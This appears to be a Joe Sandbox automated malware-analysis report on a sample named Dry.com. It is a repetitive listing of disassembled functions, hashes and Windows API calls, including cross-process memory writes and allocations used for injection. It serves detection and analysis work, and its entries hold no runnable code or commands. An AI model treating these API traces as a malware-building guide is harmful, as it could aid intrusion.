                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1ff5c0a76da9e8a3fd104f589a1fb085c8eb05dbdd47b437981c1b65d3fdee2e
                                                                                                                                                                                                                                                                                    • Instruction ID: 4bbf18f71cb63ab7cd698fcca5c73491c04c54c93e585bd5997989dd57b37d96
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ff5c0a76da9e8a3fd104f589a1fb085c8eb05dbdd47b437981c1b65d3fdee2e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72F017B2548614AB8624EB68F983C9B77EEEE097107E50CD9F00AD7901CB34FCC08A64
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1262E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4), ref: 00B12D4E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B12D38: GetLastError.KERNEL32(00BB1DC4,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4,00BB1DC4), ref: 00B12D60
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B12640
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B12653
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B12664
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B12675
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b667adb3d61199b4cfdf112df18a935c907e61d9241cf3a36ba9fa1c7a1dd65b
                                                                                                                                                                                                                                                                                    • Instruction ID: 4321114137c4f3936f95b31b760b77e2e319f5f2cf70554c6c5a4cc2fb0a0423
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b667adb3d61199b4cfdf112df18a935c907e61d9241cf3a36ba9fa1c7a1dd65b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CEF0DAB18011209B8602AF58FC128983BE4FB257513850B9AF415D72B5CF754AA1EF84
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __freea$_free
                                                                                                                                                                                                                                                                                    • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                    • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                    • Opcode ID: 0f1d6746e68e66f79b01d8ec46a8d60623e703e5cf78702cf7d39d051ed42db6
                                                                                                                                                                                                                                                                                    • Instruction ID: bd8329463542ceb0fa01f7623ea8510b52b6e5aa419c8708d47712af25b80e78
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f1d6746e68e66f79b01d8ec46a8d60623e703e5cf78702cf7d39d051ed42db6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23D1F2719102069ACB24DF6CC8957FAB7F5FF15700FA849DAE6029B294D3369DC0CBA1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B42B1D,?,?,00000034,00000800,?,00000034), ref: 00B4BDF4
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B430AD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B42B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00B4BDBF
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00B4BD1C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B42AE1,00000034,?,?,00001004,00000000,00000000), ref: 00B4BD2C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B42AE1,00000034,?,?,00001004,00000000,00000000), ref: 00B4BD42
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B4311A
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B43167
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                    • Opcode ID: 51b29bf9e8f723ecf45c434e718ec6435fefcb732baa8eabf12282b3bf2c4287
                                                                                                                                                                                                                                                                                    • Instruction ID: c37c1715e5a42d736332f1e178947ee85fdfbc93e92146e2c764761ca60eb509
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51b29bf9e8f723ecf45c434e718ec6435fefcb732baa8eabf12282b3bf2c4287
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43411672900218BEDB10DFA4CD85EEEBBB8EF49700F1440A5FA45B7181DA70AF85DB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\245347\Dry.com,00000104), ref: 00B11AD9
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B11BA4
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B11BAE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                    • API String ID: 2506810119-1821254949
                                                                                                                                                                                                                                                                                    • Opcode ID: 46d5030f60beb6ae854da0a577636b931ba4020547a29e36f0e62a5b01c7f6e1
                                                                                                                                                                                                                                                                                    • Instruction ID: 6a61d77f877503a7df172ed0a79010aee5d58bd381ebc822dda568a00a05abb7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46d5030f60beb6ae854da0a577636b931ba4020547a29e36f0e62a5b01c7f6e1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D315E71A04218ABCB21DF99D885DDFBBFCEF85710B5045E6E90497221E6B04E81CB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B4CBB1
                                                                                                                                                                                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00B4CBF7
                                                                                                                                                                                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00BB29C0,012E5FF8), ref: 00B4CC40
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                    • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                    • Opcode ID: 1cbafde28cf9e533edc7270b9aebcbc228e9e9a8fcc956c0052b743b1317a374
                                                                                                                                                                                                                                                                                    • Instruction ID: 97d3dc145cd7c59eecf22beb1ece5918a32377f27a1ea9b60d18a3360fa43cd5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cbafde28cf9e533edc7270b9aebcbc228e9e9a8fcc956c0052b743b1317a374
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4841A2312053029FD760DF28D8C5B1ABFE4EF84B14F14465DF5A997292DB30AA04DB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B7DCD0,00000000,?,?,?,?), ref: 00B74F48
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32 ref: 00B74F65
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B74F75
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                    • Opcode ID: 453420062b0ad8624d249d419570f65c2bda8d9d23c8ce8c57f43ba5a8240cdf
                                                                                                                                                                                                                                                                                    • Instruction ID: 38601197e4a5190713c1e8c953daec227359365edb7f7fb69aaf79513102b99f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 453420062b0ad8624d249d419570f65c2bda8d9d23c8ce8c57f43ba5a8240cdf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6317831204205AFDB258E78DC45BEA7BA9EF09375F208725F97DA61E0DB70AC909B50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B63DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00B63AD4,?,?), ref: 00B63DD5
                                                                                                                                                                                                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B63AD7
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B63AF8
                                                                                                                                                                                                                                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00B63B63
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                    • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                    • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                    • Opcode ID: dbec756ffb67aeb40172548fd3eeda069dd6f295f37ce20454eaf7f93bc0eeb9
                                                                                                                                                                                                                                                                                    • Instruction ID: b332034c72101f96a9dfe4dd2e2740e0cb2227c3522226ca0144df8d8bd9e09b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbec756ffb67aeb40172548fd3eeda069dd6f295f37ce20454eaf7f93bc0eeb9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6331B3356002019FCB10CF68C9C5E6A77F0EF15724F288199E9168B392D779EE46CB61
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B749DC
                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B749F0
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B74A14
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                    • Opcode ID: 4c5693a31e6ffcf43d868e3bd527b31e49f20462cbd0bc83542cef4b02b1b332
                                                                                                                                                                                                                                                                                    • Instruction ID: 7ce8ccb1de27d7267b33afab55643f369bcfdebfb4a5dfdb52ee84e01b37e15c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c5693a31e6ffcf43d868e3bd527b31e49f20462cbd0bc83542cef4b02b1b332
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8821BF32600219AFDF118FA0DC46FEB3BB9EF48714F114254FA296B1D0DBB1A891DB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B751A3
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B751B1
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B751B8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                    • Opcode ID: 675d47ccf5bda2dd690b5edf7ba11eb9dd487eea3e4e4446ae799dd38e29f8e8
                                                                                                                                                                                                                                                                                    • Instruction ID: 4bd51ce406f3af61ec2a0f1e096e74eb20babc702e059f2618cc8366ec282cb9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 675d47ccf5bda2dd690b5edf7ba11eb9dd487eea3e4e4446ae799dd38e29f8e8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B02181B5600649AFDB10DF18DC85DA637EDEF59364B404199F9189B3A1CA70EC11CBA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B742DC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B742EC
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B74312
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                    • String ID: Listbox
                                                                                                                                                                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                    • Opcode ID: ff3bfc02f7d324fe95438a85fc1a88ff5c32053a90a649dcbff5e85ce36037d8
                                                                                                                                                                                                                                                                                    • Instruction ID: fb48f71d8edff1ab223edb2966dc2b08fe81b695322d6707f2169c9544ceeacf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff3bfc02f7d324fe95438a85fc1a88ff5c32053a90a649dcbff5e85ce36037d8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A021C232610118BBEF118F94DC85FBF37AEEF89754F118164F918AB191CB719C5287A0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00B5544D
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B554A1
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,00B7DCD0), ref: 00B55515
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                    • String ID: %lu
                                                                                                                                                                                                                                                                                    • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                    • Opcode ID: e72a51cbdc7c6686e58d35133b44973f6a51f0df03f673e88ab4ff1ba6af34c8
                                                                                                                                                                                                                                                                                    • Instruction ID: ce2c7e0314d7af550d139e1342568f87a3e41df5748d30a8c24479df8d727c4c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e72a51cbdc7c6686e58d35133b44973f6a51f0df03f673e88ab4ff1ba6af34c8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C316F70A00148AFDB11DF64C985EAA77F8EF04305F1480A8F809EB362DB71EE45CB61
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B74CED
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B74D02
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B74D0F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
